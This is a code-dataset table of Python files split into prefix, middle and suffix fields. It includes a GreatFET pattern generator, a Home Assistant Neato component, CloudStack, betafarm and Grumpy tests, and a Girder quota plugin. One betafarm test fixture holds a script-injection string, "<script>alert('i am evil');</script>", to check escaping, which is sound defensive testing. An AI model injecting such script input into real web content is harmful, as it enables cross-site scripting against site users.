repo_name stringlengths 5 100 | path stringlengths 4 231 | language stringclasses 1 value | license stringclasses 15 values | size int64 6 947k | score float64 0 0.34 | prefix stringlengths 0 8.16k | middle stringlengths 3 512 | suffix stringlengths 0 8.17k |
|---|---|---|---|---|---|---|---|---|
dominicgs/GreatFET-experimental | host/greatfet/interfaces/pattern_generator.py | Python | bsd-3-clause | 2,137 | 0.006083 | #
# This file is part of GreatFET
#
from ..interface import GreatFETInterface
class PatternGenerator(GreatFETInterface):
"""
Class that supports using the GreatFET as a simple pattern generator.
"""
def __init__(self, board, sample_rate=1e6, bus_width=8):
""" Set up a GreatFET pattern generator object. """
# Grab a reference to the board and its pattern-gen API.
self.board = board
self.api = board.apis.pattern_generator
# Grab a reference to the user's bus parameters.
self.sample_rate = int(sample_rate)
self.bus_width = bus_width
# FIXME: These should be read from the board, rather than hardcoded!
self.upload_chunk_size = 2048
self.samples_max = 32 * 1024
def set_sample_rate(self, sample_rate):
""" Updates the generator's sample rates. """
self.sample_rate = int(sample_rate)
def _upload_samples(self, samples):
""" Uploads a collection of samples into the board's sample memory; precedes scan-out of those samples. """
# Iterate over the full set of provided samples, uploading them in chunks.
for offset in range(0, len(samples), self.upload_chunk_size):
chunk = samples[offset:offset + self.upload_chunk_size]
self.api.upload_samples(offset, chunk)
def scan_out_pattern(self, samples, repeat=True):
""" Sends a collection of fixed samples to the board, and then instructs it to repeatedly """
samples = bytes(samples)
# Upload the samples to be scanned out...
self._upload_samples(samples)
# ... and then trigger the scan-out itself.
self.api.generate_pattern(self.sample_r | ate, self.bus_width, len(samples), repeat)
def stop(self):
""" Stops the board from scanning out any further samples. """
self.api.stop()
def dump_sgpio_config(self, include_unused=False):
""" Debug function; returns the board's dumped SGPIO configuration. """
self.api.dump_sgpio_configuration(include_unused)
return self.board.read_debug_ring() | |
ewandor/home-assistant | homeassistant/components/neato.py | Python | apache-2.0 | 3,962 | 0 | """
Support for Neato botvac connected vacuum cleaners.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/neato/
"""
import logging
from datetime import timedelta
from urllib.error import HTTPError
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.const import CONF_PASSWORD, CONF_USERNAME
from homeassistant.helpers import discovery
from homeassistant.util import Throttle
_LOGGER = logging.getLogger(__name__)
REQUIREMENTS = ['https://github.com/jabesq/pybotvac/archive/v0.0.4.zip'
'#pybotvac==0.0.4']
DOMAIN = 'neato'
NEATO_ROBOTS = 'neato_robots'
NEATO_LOGIN = 'neato_login'
NEATO_MAP_DATA = 'neato_map_data' |
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Required(CONF_USERNAME): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
})
}, extra=vol.ALLOW_EXTRA)
STATES = {
1: 'Idle',
2: 'Busy',
3: 'Pause',
4: 'Error'
}
MODE = {
1: 'Eco',
2: 'Turbo'
}
ACTION = {
0: 'No action' | ,
1: 'House cleaning',
2: 'Spot cleaning',
3: 'Manual cleaning',
4: 'Docking',
5: 'User menu active',
6: 'Cleaning cancelled',
7: 'Updating...',
8: 'Copying logs...',
9: 'Calculating position...',
10: 'IEC test'
}
ERRORS = {
'ui_error_brush_stuck': 'Brush stuck',
'ui_error_brush_overloaded': 'Brush overloaded',
'ui_error_bumper_stuck': 'Bumper stuck',
'ui_error_dust_bin_missing': 'Dust bin missing',
'ui_error_dust_bin_full': 'Dust bin full',
'ui_error_dust_bin_emptied': 'Dust bin emptied',
'ui_error_navigation_backdrop_leftbump': 'Clear my path',
'ui_error_navigation_noprogress': 'Clear my path',
'ui_error_navigation_origin_unclean': 'Clear my path',
'ui_error_navigation_pathproblems_returninghome': 'Cannot return to base',
'ui_error_navigation_falling': 'Clear my path',
'ui_error_picked_up': 'Picked up',
'ui_error_stuck': 'Stuck!'
}
ALERTS = {
'ui_alert_dust_bin_full': 'Please empty dust bin',
'ui_alert_recovering_location': 'Returning to start'
}
def setup(hass, config):
"""Set up the Neato component."""
from pybotvac import Account
hass.data[NEATO_LOGIN] = NeatoHub(hass, config[DOMAIN], Account)
hub = hass.data[NEATO_LOGIN]
if not hub.login():
_LOGGER.debug("Failed to login to Neato API")
return False
hub.update_robots()
for component in ('camera', 'vacuum', 'switch'):
discovery.load_platform(hass, component, DOMAIN, {}, config)
return True
class NeatoHub(object):
"""A My Neato hub wrapper class."""
def __init__(self, hass, domain_config, neato):
"""Initialize the Neato hub."""
self.config = domain_config
self._neato = neato
self._hass = hass
self.my_neato = neato(
domain_config[CONF_USERNAME],
domain_config[CONF_PASSWORD])
self._hass.data[NEATO_ROBOTS] = self.my_neato.robots
self._hass.data[NEATO_MAP_DATA] = self.my_neato.maps
def login(self):
"""Login to My Neato."""
try:
_LOGGER.debug("Trying to connect to Neato API")
self.my_neato = self._neato(
self.config[CONF_USERNAME], self.config[CONF_PASSWORD])
return True
except HTTPError:
_LOGGER.error("Unable to connect to Neato API")
return False
@Throttle(timedelta(seconds=1))
def update_robots(self):
"""Update the robot states."""
_LOGGER.debug("Running HUB.update_robots %s",
self._hass.data[NEATO_ROBOTS])
self._hass.data[NEATO_ROBOTS] = self.my_neato.robots
self._hass.data[NEATO_MAP_DATA] = self.my_neato.maps
def download_map(self, url):
"""Download a new map image."""
map_image_data = self.my_neato.get_map_image(url)
return map_image_data
|
ikoula/cloudstack | test/integration/component/test_vpc_network_pfrules.py | Python | gpl-2.0 | 43,341 | 0.004961 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" Component tests for VPC network functionality - Port Forwarding Rules.
"""
from nose.plugins.attrib import attr
from marvin.cloudstackTestCase import cloudstackTestCase
from marvin.lib.base import (stopRouter,
startRouter,
Account,
VpcOffering,
VPC,
ServiceOffering,
NATRule,
NetworkACL,
PublicIPAddress,
NetworkOffering,
Network,
VirtualMachine,
LoadBalancerRule)
from marvin.lib.common import (get_domain,
get_zone,
get_template,
list_routers)
from marvin.lib.utils import cleanup_resources
import socket
import time
import sys
class Services:
"""Test VPC network services - Port Forwarding Rules Test Data Class.
"""
def __init__(self):
self.services = {
"account": {
"email": "test@test.com",
"firstname": "Test",
"lastname": "User",
"username": "test",
# Random characters are appended for unique
# username
"password": "password",
},
"host1": None,
"host2": None,
"service_offering": {
"name": "Tiny Instance",
"displaytext": "Tiny Instance",
"cpunumber": 1,
"cpuspeed": 100,
"memory": 128,
},
"network_offering": {
"name": 'VPC Network offering',
"displaytext": 'VPC Network off',
"guestiptype": 'Isolated',
"supportedservices": 'Vpn,Dhcp,Dns,SourceNat,PortForwarding,Lb,UserData,StaticNat,NetworkACL',
"traffictype": 'GUEST',
"availability": 'Optional',
"useVpc": 'on',
"serviceProviderList": {
"Vpn": 'VpcVirtualRouter',
"Dhcp": 'VpcVirtualRouter',
"Dns": 'VpcVirtualRouter',
"SourceNat": 'VpcVirtualRouter',
"PortForwarding": 'VpcVirtualRouter',
"Lb": 'VpcVirtualRouter',
"UserData": 'VpcVirtualRouter',
"StaticNat": 'VpcVirtualRouter',
"NetworkACL": 'VpcVirtualRouter'
},
},
"network_offering_no_lb": {
"name": 'VPC Network offering',
"displaytext": 'VPC Network off',
"guestiptype": 'Isolated',
"supportedservices": 'Dhcp,Dns,SourceNat,PortForwarding,UserData,StaticNat,NetworkACL',
"traffictype": 'GUEST',
"availability": 'Optional',
"useVpc": 'on',
"serviceProviderList": {
"Dhcp": 'VpcVirtualRouter',
"Dns": 'VpcVirtualRouter',
"SourceNat": 'VpcVirtualRouter',
"PortForwarding": 'VpcVirtualRouter',
"UserData": 'VpcVirtualRouter',
"StaticNat": 'VpcVirtualRouter',
"NetworkACL": 'VpcVirtualRouter'
},
},
"vpc_offering": {
"name": 'VPC off',
"displaytext": 'VPC off',
"supportedservices": 'Dhcp,Dns,SourceNat,PortForwarding,Vpn,Lb,UserData,StaticNat',
},
"vpc": {
"name": "TestVPC",
"displaytext": "TestVPC",
"cidr": '10.0.0.1/24'
},
"network": {
"name": "Test Network",
"displaytext": "Test Network",
"netmask": '255.255.255.0'
},
"lbrule": {
"name": "SSH",
"alg": "leastconn",
# Algorithm used for load balancing
"privateport": 22,
"publicport": 2222,
"openfirewall": False,
"startport": 22,
"endport": 2222,
"protocol": "TCP",
"cidrlist": '0.0.0.0/0',
},
"lbrule_http": {
"name": "HTTP",
"alg": "leastconn",
# Algorithm used for load balancing
"privateport": 80,
"publicport": 8888,
"openfirewall": False,
"startport": 80,
"endport": 8888,
"protocol": "TCP",
"cidrlist": '0.0.0.0/0',
},
"natrule": {
"privateport": 22,
"publicport": 22,
"startport": 22,
"endport": 22,
"protocol": "TCP",
"cidrlist": '0.0.0.0/0',
},
"http_rule": {
"privateport": 80,
"publicport": 80,
"startport": 80,
"endport": 80,
"cidrlist": '0.0.0.0/0',
"protocol": "TCP"
},
"virtual_machine": {
"displayname": "Test VM",
"username": "root",
"password": "password",
"ssh_port": 22,
# "hypervisor": 'XenServer',
# Hypervisor type should be same as
# hypervisor type of cluster
"privateport": 22,
"publicport": 22,
"protocol": 'TCP',
},
"ostype": 'CentOS 5.3 (64-bit)',
"timeout": 10,
}
class TestVPCNetworkPFRules(cloudstackTestCase):
@classmethod
def setUpClass(cls):
# We want to fail quicker if it's failure
socket.setdefaulttimeout(60)
cls.testClient = su | per(TestVPCNetworkPFRules, cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.services = Services().services
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls.template = get_template(
cls.api_client,
cls.zone.id, |
cls.services["ostype"]
)
cls.services["virtual_machine"]["zoneid"] = cls.zone.id
cls.services["virtual_machine"]["template"] = cls.template.id
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.services["service_offering"]
)
cls._cleanup = [cls.service_offering]
return
@classmethod
def tearDownClass(cls):
try:
#Cleanup res |
GrampusTeam/Grampus | core/directorio.py | Python | bsd-3-clause | 750 | 0.005333 | import os
import tempfile
import shutil
def listar(director | io):
"""Regresa uns lista con los archivos contenidos
en unca carpeta"""
archivos = os.listdir(directorio)
buff = []
for archivo in archivos:
ruta = os.path.join(directorio, archivo)
if os.path.isfile(ruta):
buff.append(ruta)
return buff
def crear(prefijo="Gram"):
"""Crea una carpeta temporal y regresa un string con la | ruta
la variable prefijo define el prefijo que se usara para la
carpeta, por defecto se usara Gram"""
temp = tempfile.mkdtemp(prefix=prefijo)
return temp
def eliminar(ruta):
"""Elimina un directorio, toma como parametro la ruta del directorio
a eliminar"""
shutil.rmtree(ruta) |
apache/libcloud | docs/examples/compute/azure/instantiate.py | Python | apache-2.0 | 212 | 0.004717 | from libcloud.compute. | types import Provider
from libcloud.compute.providers import get_driver
cls = get_driver(Provider.AZURE)
driver = cls(subscription_id="subscription-id", key_fil | e="/path/to/azure_cert.pem")
|
WillianPaiva/1flow | oneflow/settings/snippets/api_keys.py | Python | agpl-3.0 | 1,941 | 0 | # -*- coding: utf-8 -*-
#
# Django API keys, all loaded from the environment,
# conforming to http://www.12factor.net/config :-D
#
u"""
Copyright 2013 Olivier Cortès <oc@1flow.io>.
This file is part of the 1flow project.
1flow is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation, either version 3 of
the License, or (at your option) any later version.
1flow is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public
License along with 1flow. If not, see http://www.gnu.org/licenses/
"""
import os
__module_globals = globals()
for key_name in (
# ••••••••••••••••••••••••••••••••••••••••••••• Django Social Auth API keys
'SOCIAL_AUTH_TWITTER_KEY',
'SOCIAL_AUTH_TWITTER_SECRET',
# 'GOOGLE_DISPLAY_NAME',
# 'GOOGLE_CONSUMER_KEY',
# 'GOOGLE_CONSUMER_SECRET',
'SOCIAL_AUTH_GOOGLE_OAUTH2_KEY',
'SOCIAL_AUTH_GOOGLE_OA | UTH2_SECRET',
'SOCIAL_AUTH_GITHUB | _KEY',
'SOCIAL_AUTH_GITHUB_SECRET',
'SOCIAL_AUTH_FACEBOOK_KEY',
'SOCIAL_AUTH_FACEBOOK_SECRET',
# 'SOCIAL_AUTH_GOOGLE_PLUS_KEY',
# 'SOCIAL_AUTH_GOOGLE_PLUS_SECRET',
'SOCIAL_AUTH_LINKEDIN_KEY',
'SOCIAL_AUTH_LINKEDIN_SECRET',
# •••••••••••••••••••••••••••••••••••••••••••••••••••••••••• Other API keys
'READABILITY_PARSER_SECRET',
):
os_env = os.environ.get(key_name, None)
if os_env is None:
continue
__module_globals[key_name] = os_env
|
opadron/girder | plugins/user_quota/server/quota.py | Python | apache-2.0 | 18,128 | 0 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright 2015 Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import json
import six
from bson.objectid import ObjectId, InvalidId
from girder import logger
from girder.api import access
from girder.api.describe import Description
from girder.api.rest import Resource, RestException, loadmodel
from girder.constants import AccessType
from girder.models.model_base import GirderException
from girder.utility import assetstore_utilities
from girder.utility.system import formatSize
from . import constants
QUOTA_FIELD = 'quota'
def ValidateSizeQuota(value):
"""
Validate a quota value. This may be blank or a non-negative integer.
:param value: The proposed value.
:type value: int
:returns: The validated value or None,
and a recommended error message or None.
:rtype: (int or None, str or None)
"""
if value is None or value == '' or value == 0:
return None, None
error = False
try:
value = int(value)
if value < 0:
error = True
except ValueError:
error = True
if error:
return (value, 'Invalid quota. Must be blank or a positive integer '
'representing the limit in bytes.')
if value == 0:
return None, None
return value, None
class QuotaPolicy(Resource):
def _filter(self, model, resource):
"""
Filter a resource to include only the ordinary data and the quota
field.
:param model: the type of resource (e.g., user or collection)
:param resource: the resource document.
:returns: filtered field of the resource with the quota data, if any.
"""
filtered = self.model(model).filter(resource, self.getCurrentUser())
filtered[QUOTA_FIELD] = resource.get(QUOTA_FIELD, {})
return filtered
def _setResourceQuota(self, model, resource, params):
"""
Handle setting quota policies for any resource that supports them.
:param model: the type of resource (e.g., user or collection)
:param resource: the resource document.
:param params: the query parameters. 'policy' is required and used.
:returns: the updated resource document.
"""
self.requireParams(('policy', ), params)
policy = self._validatePolicy(params['policy'])
if QUOTA_FIELD not in resource:
resource[QUOTA_FIELD] = {}
resource[QUOTA_FIELD].update(policy)
self.model(model).save(resource, validate=False)
return self._filter(model, resource)
def _validate_fallbackAssetstore(self, value):
"""Validate the fallbackAssetstore parameter.
:param value: the proposed value.
:returns: the validated value: either None or 'current' to use the
current assetstore, 'none' to disable a fallback assetstore,
or an assetstore ID.
"""
if not value or value == 'current':
return None
if value == 'none':
return value
try:
value = ObjectId(value)
except InvalidId:
raise RestException(
'Invalid fallbackAssetstore. Must either be an assetstore '
'ID, be blank or "current" to use the current assetstore, or '
'be "none" to disable fallback usage.',
extra='fallbackAssetstore')
return value
def _validate_fileSizeQuota(self, value):
"""Validate the fileSizeQuota parameter.
:param value: the proposed value.
:returns: the validated value
:rtype: None or int
"""
(value, err) = ValidateSizeQuota(value)
if err:
raise RestException(err, extra='fileSizeQuota')
return value
def _validate_preferredAssetstore(self, value):
"""Validate the preferredAssetstore parameter.
:param value: the proposed value.
:returns: the validated value: either None or 'current' to use the
current assetstore or an assetstore ID.
"""
if not value or value == 'current':
return None
try:
value = ObjectId(value)
except InvalidId:
raise RestException(
'Invalid preferredAssetstore. Must either be an assetstore '
'ID, or be blank or "current" to use the current assetstore.',
extra='preferredAssetstore')
return value
def _validate_useQuotaDefault(self, value):
"""Validate the useQuotaDefault parameter.
:param value: the proposed value.
:returns: the validated value
:rtype: None or bool
"""
if str(value).lower() in ('none', 'true', 'yes', '1'):
return True
if str(value).lower() in ('false', 'no', '0'):
return False
raise RestException(
'Invalid useQuotaDefault. Must either be true or false.',
extra='useQuotaDefault')
def _validatePolicy(self, policy):
"""
Validate a policy JSON object. Only a limited set of keys is
supported, and each of them has a restricted data type.
:param policy: JSON object to validate. This may also be a Python
dictionary as if the JSON was already decoded.
:returns: a validate policy dictionary.
"""
if not isinstance(policy, dict):
try:
policy = json.loads(policy)
except ValueError:
raise RestException('The policy parameter must be JSON.')
if not isinstance(policy, dict):
raise RestException('The policy parameter must be a dictionary.')
validKeys = []
for key in dir(self):
if key.startswith('_validate_'):
validKeys.append(key.split('_validate_', 1)[1])
for key in list(policy):
if key.startswith('_'):
del policy[key]
for key in policy:
if key not in validKeys:
raise RestException(
'%s is not a valid quota policy key. Valid keys are '
'%s.' % (key, ', '.join(sorted(validKeys))))
funcName = '_validate_' + key
policy[key] = getattr(self, funcName)(policy[key])
return policy
@access.public
@loadmodel(model='collection', level=AccessType.READ)
def getCollectionQuota(self, collection, params):
if QUOTA_FIELD not in collection:
collection[QUOTA_FIELD] = {}
collection[QUOTA_FIELD][
'_currentFileSizeQuota'] = self._getFileSizeQuota(
'collection', collection)
return self._filter( | 'collection', collection)
getCollectionQuota.description = (
Description('Get quota and assetstore policies for the collection.')
.param('id', 'The collection ID', paramType='path')
.errorResponse('ID was invalid.')
.errorResponse('Read permission denied on the collection.', 403))
@access.public
@loadmodel(model='collection', level=AccessType.ADMIN)
def setCollectionQuo | ta(self, collection, params):
return self._setResourceQuota('collection', collection, params)
setCollectionQuota.description = (
Description('Set quota and assetstore policies for the collection.')
.param('id', 'The collection ID', paramType='path')
. |
mozilla/betafarm | apps/projects/tests.py | Python | bsd-3-clause | 17,989 | 0.000111 | import os
from django.conf import settings
from django.contrib.auth.models import User
import requests
from test_utils import TestCase, SkipTest
from commons.urlresolvers import reverse
from projects import cron
from projects.models import DEFAULT_INACTIVE_MESSAGE, Link, Project
from topics.models import Topic
from users.models import Profile
class TestCron(TestCase):
def test_get_isotope(self):
try:
requests.get('https://github.com/')
except requests.ConnectionError:
raise SkipTest('Could not connect to Github.')
if os.path.exists(cron.ISOTOPE_PATH):
os.remove(cron.ISOTOPE_PATH)
self.assertFalse(os.path.exists(cron.ISOTOPE_PATH))
cron.get_isotope()
self.assertTrue(os.path.exists(cron.ISOTOPE_PATH))
class TestModels(TestCase):
def setUp(self):
"""Create user and a project with a topic."""
self.owner_password = 'TheBumsLost'
self.owner = User.objects.create_user(
username='jlebowski',
password=self.owner_password,
email='jlebowski@aol.com',
)
self.owner_profile = Profile.objects.create(user=self.owner)
self.topic = Topic.objects.create(
name='Bowling',
slug='bowling',
description='League play.',
)
self.project = Project.objects.create(
name='Get Rug Back',
slug='rug-back',
description='This aggression will not stand, man!',
long_description='Not into the whole, brevity thing.',
)
self.link = Link.objects.create(
project=self.project,
name='Testing',
url='http://example.com',
)
self.project.topics.add(self.topic)
self.project.owners.add(self.owner_profile)
def test_inactive_message(self):
"""Test that the custom message is returned when set."""
self.project.inactive = True
self.project.save()
self.assertEqual(self.project.inactive_message_or_default,
DEFAULT_INACTIVE_MESSAGE)
new_msg = 'This is a way moar awesomer message'
self.project.inactive_message = new_msg
self.project.save()
self.assertEqual(self.project.inactive_message_or_default,
new_msg)
def test_can_delete_projects(self):
"""Regression test. Deletes were failing"""
# turns out the reason was that the foreign key to Project
# from Link was changed to null=True at some point, but no
# migration was created. null=True was removed as Links are
# meaningless without Projects now.
self.project.delete()
with self.assertRaises(Project.DoesNotExist):
Project.objects.get(pk=self.project.pk)
with self.assertRaises(Link.DoesNotExist):
Link.objects.get(pk=self.link.pk)
def test_deleting_project_deletes_images(self):
self.assertTrue(self.client.login(
username=self.owner.username,
password=self.owner_password
))
fname = os.path.join(os.path.abspath(os.p | ath.dirname(__file__)),
'test_data',
'abide.jpg')
with open | (fname) as f:
# TODO: make localized URL handling suck less
self.client.post('/en-US' + self.project.get_edit_url(), {
'name': self.project.name,
'slug': self.project.slug,
'description': self.project.description,
'long_description': 'This is totally long.',
'topics': [self.topic.id],
'owners_1': [self.owner_profile.pk],
'team_members_1': [self.owner_profile.pk],
'image': f,
})
proj = Project.objects.get(pk=self.project.pk)
imgpath = os.path.join(settings.MEDIA_ROOT, proj.image.name)
self.assertTrue(os.path.exists(imgpath))
proj.delete()
self.assertFalse(os.path.exists(imgpath))
class TestViews(TestCase):
def setUp(self):
"""Create user and a project with a topic."""
self.password = 'lovezrugz'
self.user = User.objects.create_user(
username='TheDude',
password=self.password,
email='duder@aol.com',
)
self.profile = Profile.objects.create(user=self.user)
self.owner_password = 'TheBumsLost'
self.owner = User.objects.create_user(
username='jlebowski',
password=self.owner_password,
email='jlebowski@aol.com',
)
self.owner_profile = Profile.objects.create(user=self.owner)
self.topic = Topic.objects.create(
name='Bowling',
slug='bowling',
description='League play.',
)
self.project = Project.objects.create(
name='Get Rug Back',
slug='rug-back',
description='This aggression will not stand, man!',
long_description='Not into the whole, brevity thing.',
)
self.project_xss = Project.objects.create(
name='Get Rug Back',
slug='rug-back-b',
description='This aggression will not stand, man!',
long_description="<script>alert('i am evil');</script>",
)
self.project.topics.add(self.topic)
self.project.team_members.add(self.profile)
self.project.owners.add(self.owner_profile)
def test_view_all(self):
"""Make sure the list all view displays our project."""
resp = self.client.get(reverse('projects_all'), follow=True)
self.assertContains(resp, self.project.name)
# make sure only projects with at least one topic are shown
self.project.topics.remove(self.topic)
self.project.save()
resp = self.client.get(reverse('projects_all'), follow=True)
self.assertNotContains(resp, self.project.name)
def test_view_one(self):
"""Test that the project detail page works."""
resp = self.client.get(self.project.get_absolute_url(), follow=True)
self.assertContains(resp, self.project.name)
self.assertContains(resp, self.project.long_description)
def test_user_owner_and_team_member_shows_once(self):
"""Ensure members who are owners don't show up twice on project page"""
self.project.owners.add(self.profile)
resp = self.client.get(self.project.get_absolute_url(), follow=True)
self.assertContains(resp, self.profile.get_absolute_url(), 1)
def test_team_members_list_is_ordered(self):
resp = self.client.get(self.project.get_absolute_url(), follow=True)
self.assertEqual(resp.context['proj_people'],
[self.owner_profile, self.profile])
def test_following(self):
"""Test that users can follow projects."""
self.assertTrue(self.client.login(
username=self.user.username,
password=self.password
))
resp = self.client.get(self.project.get_absolute_url(), follow=True)
self.assertEqual(resp.context['project'].followers.count(), 0)
resp = self.client.post(
reverse('projects_follow', kwargs={'slug': self.project.slug}),
follow=True,
)
self.assertEqual(resp.context['project'].followers.count(), 1)
def test_unfollowing(self):
"""Test that users can stop following projects."""
self.test_following()
resp = self.client.post(
reverse('projects_unfollow', kwargs={'slug': self.project.slug}),
follow=True,
)
self.assertEqual(resp.context['project'].followers.count(), 0)
def test_owner_sees_edit_button(self):
"""Test that only a project owner can see the edit button"""
resp = self.client.get(self.project.get_absolute_url(), follow=True)
self.assertContains(resp, self.project.name)
self.assertContains(resp, self.project.long_description)
self.assertNotContains(resp, self.project.get_edit_url())
self.assert |
dywisor/kernelconfig | kernelconfig/kconfig/abc/solcache.py | Python | gpl-2.0 | 696 | 0 | # kernelconfig -- abstract description of Kconfig-related classes
# -*- coding: utf-8 -*-
import abc
__all__ = ["AbstractSymbo | lExprSolutionCache"]
class AbstractSymbolExprSolutionCache(object, metaclass=abc.ABCMeta):
@abc.abstractmethod
def push_symbol(self, sym, values):
raise NotImplementedError()
@abc.abstractmethod
def get_solutions(self):
raise NotImplementedError()
@abc.abstractmethod
def merge(self, sol_cache):
raise NotImplementedError()
@abc.abstractmethod
def merge_alternatives(self, alternatives):
raise NotImplementedError()
|
@abc.abstractmethod
def copy(self):
raise NotImplementedError()
|
corona10/grumpy | grumpy-tools-src/grumpy_tools/compiler/stmt_test.py | Python | apache-2.0 | 16,929 | 0.004726 | # coding=utf-8
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for StatementVisitor."""
from __future__ import unicode_literals
import re
import subprocess
import textwrap
import unittest
from grumpy_tools.compiler import block
from grumpy_tools.compiler import imputil
from grumpy_tools.compiler import shard_test
from grumpy_tools.compiler import stmt
from grumpy_tools.compiler import util
from grumpy_tools.vendor import pythonparser
from grumpy_tools.vendor.pythonparser import ast
class StatementVisitorTest(unittest.TestCase):
def testAssertNoMsg(self):
self.assertEqual((0, 'AssertionError()\n'), _GrumpRun(textwrap.dedent("""\
try:
assert False
except AssertionError as e:
print repr(e)""")))
def testAssertMsg(self):
want = (0, "AssertionError('foo',)\n")
self.assertEqual(want, _GrumpRun(textwrap.dedent("""\
try:
assert False, 'foo'
except AssertionError as e:
print repr(e)""")))
def testBareAssert(self):
# Assertion errors at the top level of a block should raise:
# https://github.com/google/grumpy/issues/18
want = (0, 'ok\n')
self.assertEqual(want, _GrumpRun(textwrap.dedent("""\
def foo():
assert False
try:
foo()
except AssertionError:
print 'ok'
else:
print 'bad'""")))
def testAssignAttribute(self):
self.assertEqual((0, '123\n'), _GrumpRun(textwrap.dedent("""\
e = Exception()
e.foo = 123
print e.foo""")))
def testAssignName(self):
self.assertEqual((0, 'bar\n'), _GrumpRun(textwrap.dedent("""\
foo = 'bar'
print foo""")))
def testAssignMultiple(self):
self.assertEqual((0, 'baz baz\n'), _GrumpRun(textwrap.dedent("""\
foo = bar = 'baz'
print foo, bar""")))
def testAssignSubscript(self):
self.assertEqual((0, "{'bar': None}\n"), _GrumpRun(textwrap.dedent("""\
foo = {}
foo['bar'] = None
print foo""")))
def testAssignTuple(self):
self.assertEqual((0, 'a b\n'), _GrumpRun(textwrap.dedent("""\
baz = ('a', 'b')
foo, bar = baz
print foo, bar""")))
def testAugAssign(self):
self.assertEqual((0, '42\n'), _GrumpRun(textwrap.dedent("""\
foo = 41
foo += 1
print foo""")))
def testAugAssignBitAnd(self):
self.assertEqual((0, '3\n'), _GrumpRun(textwrap.dedent("""\
foo = 7
foo &= 3
print foo""")))
def testAugAssignPow(self):
self.assertEqual((0, '64\n'), _GrumpRun(textwrap.dedent("""\
| foo = 8
foo **= 2
print foo""")))
def testClassDef(self):
self.assertEqual((0, "<type 'type'>\n"), _GrumpRun(textwrap.dedent("""\
class Foo(object):
pass
print type(Foo)""")))
def testClassDefWithVar(self):
self.assertEqual((0, 'abc\n'), _GrumpRun(textwrap.dedent("""\
class Foo(object):
bar = 'abc'
print Foo.bar""")))
def testDeleteAttribute(self):
self.assertEqual((0 | , 'False\n'), _GrumpRun(textwrap.dedent("""\
class Foo(object):
bar = 42
del Foo.bar
print hasattr(Foo, 'bar')""")))
def testDeleteClassLocal(self):
self.assertEqual((0, 'False\n'), _GrumpRun(textwrap.dedent("""\
class Foo(object):
bar = 'baz'
del bar
print hasattr(Foo, 'bar')""")))
def testDeleteGlobal(self):
self.assertEqual((0, 'False\n'), _GrumpRun(textwrap.dedent("""\
foo = 42
del foo
print 'foo' in globals()""")))
def testDeleteLocal(self):
self.assertEqual((0, 'ok\n'), _GrumpRun(textwrap.dedent("""\
def foo():
bar = 123
del bar
try:
print bar
raise AssertionError
except UnboundLocalError:
print 'ok'
foo()""")))
def testDeleteNonexistentLocal(self):
self.assertRaisesRegexp(
util.ParseError, 'cannot delete nonexistent local',
_ParseAndVisit, 'def foo():\n del bar')
def testDeleteSubscript(self):
self.assertEqual((0, '{}\n'), _GrumpRun(textwrap.dedent("""\
foo = {'bar': 'baz'}
del foo['bar']
print foo""")))
def testExprCall(self):
self.assertEqual((0, 'bar\n'), _GrumpRun(textwrap.dedent("""\
def foo():
print 'bar'
foo()""")))
def testExprNameGlobal(self):
self.assertEqual((0, ''), _GrumpRun(textwrap.dedent("""\
foo = 42
foo""")))
def testExprNameLocal(self):
self.assertEqual((0, ''), _GrumpRun(textwrap.dedent("""\
foo = 42
def bar():
foo
bar()""")))
def testFor(self):
self.assertEqual((0, '1\n2\n3\n'), _GrumpRun(textwrap.dedent("""\
for i in (1, 2, 3):
print i""")))
def testForBreak(self):
self.assertEqual((0, '1\n'), _GrumpRun(textwrap.dedent("""\
for i in (1, 2, 3):
print i
break""")))
def testForContinue(self):
self.assertEqual((0, '1\n2\n3\n'), _GrumpRun(textwrap.dedent("""\
for i in (1, 2, 3):
print i
continue
raise AssertionError""")))
def testForElse(self):
self.assertEqual((0, 'foo\nbar\n'), _GrumpRun(textwrap.dedent("""\
for i in (1,):
print 'foo'
else:
print 'bar'""")))
def testForElseBreakNotNested(self):
self.assertRaisesRegexp(
util.ParseError, "'continue' not in loop",
_ParseAndVisit, 'for i in (1,):\n pass\nelse:\n continue')
def testForElseContinueNotNested(self):
self.assertRaisesRegexp(
util.ParseError, "'continue' not in loop",
_ParseAndVisit, 'for i in (1,):\n pass\nelse:\n continue')
def testFunctionDecorator(self):
